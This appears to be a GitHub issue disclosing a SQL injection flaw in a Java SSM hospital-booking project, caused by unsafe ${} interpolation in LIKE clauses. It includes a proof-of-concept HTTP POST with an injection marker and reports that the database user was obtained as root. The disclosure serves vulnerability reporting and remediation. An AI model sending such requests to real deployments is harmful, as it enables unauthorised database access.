-
Notifications
You must be signed in to change notification settings - Fork 166
Description
OfficeDao->findOrderOfficeNum has injection points '%${officesName}%' and '%${hospitalName}%'

The cn. Sfturing. Service. Impl. OfficeServiceImpl# findOrderOfficeNum calls officeDao.findOrderOfficeNum(office.getHospitalName(), office.getOfficesName()); Vulnerability point
Cn. Sfturing. Web. OfficeController# orderOffcie call pageUtils. SetTotalRecord (officeService. FindOrderOfficeNum (office)); The vulnerability point, and this function point is a front-end function point, which can be accessed by any user.
The final constructed payload is:
POST /ssm_pro/orderOffice/1 HTTP/1.1
Host: localhost:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Length: 28
hospitalName=&officesName=*
Obtain the current user as "root"


